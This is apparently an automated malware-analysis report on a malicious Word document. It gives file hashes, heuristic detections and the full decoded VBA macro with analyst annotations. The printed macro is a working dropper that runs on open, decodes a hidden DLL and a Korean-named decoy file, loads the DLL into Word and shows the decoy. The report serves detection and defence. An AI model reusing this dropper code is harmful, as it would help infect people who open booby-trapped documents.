Malicious Office (OLE) / .DOC — malware analysis report

Static analysis result for SHA-256 dad2f5351e4bd310…

MALICIOUS

Office (OLE) / .DOC

Size: 214.0 KB | Created: 2025-11-21 03:19:00 | Authoring application: Microsoft Office Word | First seen: 2026-06-20
MD5: 60e25e54566af7a3ae37ce2e071e529c
SHA-1: 63f2992202730aeb595b45cc37cc4f4764bf2024
SHA-256: dad2f5351e4bd3101963ee0ec751296614a0548a2ea13f8f005d1a9e4c90586c
130 Risk Score

Heuristics 6

  • Reference to LoadLibrary API high SC_STR_LOADLIBRARY
    Reference to LoadLibrary API
  • VBA macros detected medium 2 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
    Matched line in script
        Set objDocApp = CreateObject("Word.Application")
  • AutoOpen macro low OLE_VBA_AUTOOPEN
    AutoOpen macro
    Matched line in script
    Sub AutoOpen()
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename | Kind | Source | Size
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 6635 bytes
SHA-256: e878e03dbd01ef5d7a359601be4c22b86d492b8dbdf5f77e56c20433354bd507
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
' Analyst note: Win32 imports declared under meaningless names to obscure intent.
' fhemfkdlqmfjfl resolves to kernel32!LoadLibraryA through its Alias clause; this
' is the import behind the SC_STR_LOADLIBRARY heuristic.
Private Declare PtrSafe Function fhemfkdlqmfjfl Lib "kernel32" Alias "LoadLibraryA" (ByVal tmxmfld As String) As LongPtr
' vmflrieoqjdksl has no Alias clause, so VBA looks up an export with that exact
' name in kernel32. The hLibModule parameter suggests FreeLibrary was intended;
' as declared, the call presumably fails at run time and the error is hidden by
' On Error Resume Next in AutoOpen - confirm in a sandbox.
Private Declare PtrSafe Function vmflrieoqjdksl Lib "kernel32" (ByVal hLibModule As LongPtr) As Long
' Sleep is imported under its real name; AutoOpen calls it after each load of the dropped DLL.
Private Declare PtrSafe Sub Sleep Lib "kernel32" (ByVal dwMilliseconds As LongPtr)

' Helper: renders a number as an 8-character string of "0"/"1" characters.
'   decimalValue - value to convert; the decoders pass a single byte (0-255).
'   Returns the binary digits left-padded with zeros. Right(..., 8) keeps only
'   the lowest 8 digits, and a value of 0 (or any value that skips the loop)
'   yields "00000000".
Function DecToBin(ByVal decimalValue As Long) As String
    Dim binaryStr As String
    binaryStr = ""

    ' Repeated division by 2; each remainder is prepended, so the most
    ' significant bit ends up first.
    Do While decimalValue > 0
        binaryStr = (decimalValue Mod 2) & binaryStr
        decimalValue = decimalValue \ 2
    Loop

    If binaryStr = "" Then binaryStr = "0"
    ' Pad to a fixed width so every byte contributes exactly 8 bit characters.
    DecToBin = Right("00000000" & binaryStr, 8)
End Function
' Helper: converts a hexadecimal string to its 8-character bit string via DecToBin.
'   hexValue - hex digits without the "&H" prefix.
' Analyst note: not called anywhere in the visible listing; the decoders below
' use CByte and DecToBin directly.
Function HexToBinary(hexValue As String) As String
    Dim decimalValue As Long
    decimalValue = CLng("&H" & hexValue)
    HexToBinary = DecToBin(decimalValue)
End Function
' Helper: packs an 8-character "0"/"1" string into a Byte, most significant bit first.
'   binStr - bit string; only the first 8 characters are read.
'   Returns the byte value. Mid() yields a one-character string that VBA
'   coerces to a number in the addition.
Function BinaryToByte(binStr As String) As Byte
    Dim result As Byte, k As Integer
    result = 0
    For k = 1 To 8
        result = result * 2 + Mid(binStr, k, 1)
    Next k
    BinaryToByte = result
End Function

' Analyst note: decodes the hex text stored in UserForm1.TextBox1 and writes the
' result to docpath. AutoOpen later opens that file in Word, so this appears to
' be the decoy document shown to the victim.
'   docpath - destination file path for the decoded bytes.
'   No return value is assigned.
' The transform is fixed and keyless, so the embedded file can be recovered
' statically from the control text without running the macro.
' tempbyte, temp1, temp2, i and j are not declared in this function.
Function ExtractOrgDoc(docpath)
    Dim OrgData, nDocSize, lenbinarray
    Dim binaryArray() As String
    Dim newbinaryarray() As String
    Dim inx As Long
    Dim objStream As Object
    Dim currentIndex As Long
    Dim byteBin As String

    ' Encoded content is held in a form control as hex text, two characters per byte.
    OrgData = UserForm1.TextBox1.Text
    nDocSize = Len(OrgData) / 2
    
    ' One array element per bit, each stored as a "0"/"1" string.
    ReDim binaryArray(nDocSize * 8 - 1)
    ReDim newbinaryarray(nDocSize * 8 - 1)
    
    currentIndex = 0

    ' Stage 1: parse each hex pair, XOR it with 27 (0x1B), expand it to 8 bit characters.
    For inx = 0 To nDocSize - 1
        tempbyte = CByte("&H" + Mid(OrgData, inx * 2 + 1, 2))
        tempbyte = tempbyte Xor 27
        byteBin = DecToBin(tempbyte)
        
        For j = 1 To Len(byteBin)
            binaryArray(currentIndex) = Mid(byteBin, j, 1)
            currentIndex = currentIndex + 1
        Next j
    Next inx

    ' Stage 2: within every group of 4 bits, swap the first pair with the second pair.
    lenbinarray = nDocSize * 8
    For inx = 0 To nDocSize * 8 - 4 Step 4
        temp1 = binaryArray(inx)
        temp2 = binaryArray(inx + 1)
        binaryArray(inx) = binaryArray(inx + 2)
        binaryArray(inx + 1) = binaryArray(inx + 3)
        binaryArray(inx + 2) = temp1
        binaryArray(inx + 3) = temp2
    Next inx
    
    ' Stage 3: reverse the order of the whole bit sequence and invert every bit.
    For i = 0 To lenbinarray - 1
        newbinaryarray(i) = binaryArray(lenbinarray - 1 - i)
        If newbinaryarray(i) = "1" Then
            newbinaryarray(i) = "0"
        Else
            newbinaryarray(i) = "1"
        End If
    Next i

   
    Dim fileNum As Integer
    Dim byteArray() As Byte
    Dim bitString As String
    
    ' Stage 4: repack the bits into bytes and write them to disk with native
    ' VBA file I/O. objStream is declared above but never used.
    fileNum = FreeFile
    Open docpath For Binary As #fileNum
    
    ReDim byteArray((lenbinarray \ 8) - 1)
    For i = 0 To lenbinarray - 1 Step 8
        bitString = ""
        For j = 0 To 7
            bitString = bitString & newbinaryarray(i + j)
        Next j
        byteArray(i \ 8) = BinaryToByte(bitString)
        'Debug.Print byteArray(1)
        'Debug.Print byteArray(2)
    Next i
    
    Put #fileNum, , byteArray
    Close #fileNum
End Function

' Analyst note: same decoding routine as ExtractOrgDoc, but the source is
' UserForm1.TextBox2 and the output is written to loaderpath. AutoOpen passes a
' .dll path and then loads that file, so this is the stage that puts the
' executable payload on disk.
'   loaderpath - destination file path for the decoded bytes.
'   No return value is assigned.
' The transform is fixed and keyless, so the payload can be recovered for
' analysis from the control text without executing the document.
Function ExtractLoader(loaderpath)
    Dim LoaderData, nLoaderSize, lenbinarray
    Dim binaryArray() As String
    Dim newbinaryarray() As String
    Dim inx As Long
    Dim objStream As Object
    Dim currentIndex As Long
    Dim byteBin As String

    ' Encoded content is held in a form control as hex text, two characters per byte.
    LoaderData = UserForm1.TextBox2.Text
    nLoaderSize = Len(LoaderData) / 2

    ' One array element per bit, each stored as a "0"/"1" string.
    ReDim binaryArray(nLoaderSize * 8 - 1)
    ReDim newbinaryarray(nLoaderSize * 8 - 1)

    currentIndex = 0

    ' Stage 1: parse each hex pair, XOR it with 27 (0x1B), expand it to 8 bit characters.
    For inx = 0 To nLoaderSize - 1
        tempbyte = CByte("&H" + Mid(LoaderData, inx * 2 + 1, 2))
        tempbyte = tempbyte Xor 27
        byteBin = DecToBin(tempbyte)
        
        For j = 1 To Len(byteBin)
            binaryArray(currentIndex) = Mid(byteBin, j, 1)
            currentIndex = currentIndex + 1
        Next j
    Next inx

    ' Stage 2: within every group of 4 bits, swap the first pair with the second pair.
    lenbinarray = nLoaderSize * 8
    For inx = 0 To nLoaderSize * 8 - 4 Step 4
        temp1 = binaryArray(inx)
        temp2 = binaryArray(inx + 1)
        binaryArray(inx) = binaryArray(inx + 2)
        binaryArray(inx + 1) = binaryArray(inx + 3)
        binaryArray(inx + 2) = temp1
        binaryArray(inx + 3) = temp2
    Next inx

    ' Stage 3: reverse the order of the whole bit sequence and invert every bit.
    For i = 0 To lenbinarray - 1
        newbinaryarray(i) = binaryArray(lenbinarray - 1 - i)
        If newbinaryarray(i) = "1" Then
            newbinaryarray(i) = "0"
        Else
            newbinaryarray(i) = "1"
        End If
    Next i

    Dim fileNum As Integer
    Dim byteArray() As Byte
    Dim bitString As String

    ' Stage 4: repack the bits into bytes and write them to disk with native
    ' VBA file I/O. objStream is declared above but never used.
    fileNum = FreeFile
    Open loaderpath For Binary As #fileNum

    ReDim byteArray((lenbinarray \ 8) - 1)
    For i = 0 To lenbinarray - 1 Step 8
        bitString = ""
        For j = 0 To 7
            bitString = bitString & newbinaryarray(i + j)
        Next j
        byteArray(i \ 8) = BinaryToByte(bitString)
    Next i

    Put #fileNum, , byteArray
    Close #fileNum
End Function

' Analyst note: entry point. Word runs AutoOpen when the document is opened
' with macros enabled (see the OLE_VBA_AUTOOPEN finding). Sequence visible below:
'   1. create two folders under C:\ProgramData
'   2. decode and write a decoy .docx
'   3. decode and write a DLL, then load it into the Word process
'   4. open the decoy in a new Word instance and quit the original one
' Detection opportunities: WINWORD.EXE creating directories under
' C:\ProgramData, writing a .dll there, and loading a module from that path.
Sub AutoOpen()
    Dim folderpath, loaderpath
' Every run-time error from here on is silently ignored.
On Error Resume Next
    
    ' Drop locations (host-based indicators).
    folderpath = "C:\ProgramData\HLSOffice"
    orgfolderpath = "C:\ProgramData\Document"
    MkDir (folderpath)
    MkDir (orgfolderpath)

    ' Decoy file name is Korean, roughly "2026 1st security training program
    ' guide". orgdocpath is assigned but never used; only orgnewpath is written.
    orgdocpath = folderpath & "\" & "2026년_1차_보안교육_프로그램_안내.docx"
    orgnewpath = orgfolderpath & "\" & "2026년_1차_보안교육_프로그램_안내.docx"
    ExtractOrgDoc (orgnewpath)

    ' Payload DLL decoded from UserForm1.TextBox2.
    loaderpath = folderpath & "\hlsoffice_aam.dll"
    ExtractLoader (loaderpath)

    ' fhemfkdlqmfjfl is LoadLibraryA, so the dropped DLL is loaded inside the
    ' Word process. vmflrieoqjdksl looks like a FreeLibrary call but is declared
    ' without an Alias, so it presumably fails and the module stays loaded -
    ' confirm in a sandbox. The load/sleep/call sequence runs twice (20 s, then 5 s).
    Dim h As LongPtr
    h = fhemfkdlqmfjfl(loaderpath)
    Sleep 20000
    vmflrieoqjdksl h
    h = fhemfkdlqmfjfl(loaderpath)
    Sleep 5000
    vmflrieoqjdksl h

    ' Show the decoy in a separate, visible Word instance (OLE_VBA_CREATEOBJ finding).
    Dim objDocApp
    Set objDocApp = CreateObject("Word.Application")
    objDocApp.Visible = True
    objDocApp.Documents.Open orgnewpath

    ' Close the Word instance hosting the malicious document without saving.
    Application.Quit (wdDoNotSaveChanges)
    
End Sub




Attribute VB_Name = "UserForm1"
Attribute VB_Base = "0{40DBFA34-49DC-47A0-B728-3DB5DE2DDA5C}{B2643123-6853-43D0-8A55-2FDAD717650D}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
' Analyst note: UserForm1 code-behind. All three event handlers are empty; the
' form is never shown by the visible code. Its TextBox1 and TextBox2 controls
' are read by ExtractOrgDoc and ExtractLoader as storage for the hex-encoded
' decoy and DLL. The encoded text itself is not part of this source listing;
' it presumably lives in the form's control data inside the OLE container.
Private Sub TextBox1_Change()

End Sub

Private Sub TextBox2_Change()

End Sub

Private Sub UserForm_Click()

End Sub